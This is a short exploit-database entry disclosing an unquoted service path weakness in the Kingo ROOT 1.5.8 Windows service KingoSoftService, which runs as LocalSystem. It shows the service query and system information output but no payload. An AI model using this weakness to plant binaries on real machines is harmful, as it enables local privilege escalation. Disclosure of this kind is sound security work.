Lucene search

K
zdtAnish Feroz1337DAY-ID-39024
HistorySep 04, 2023 - 12:00 a.m.

Kingo ROOT 1.5.8 - Unquoted Service Path Vulnerability

2023-09-0400:00:00
Anish Feroz
0day.today
54
kingo root
unquoted service path
vulnerability
windows 10 pro
localsystem
kingosoftservice
microsoft windows 10 pro
kingosoftservice.exe
service path
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro

-------------Discovering Unquoted Path--------------

C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Anish>systeminfo

Host Name:                 DESKTOP-UT7E7CF
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045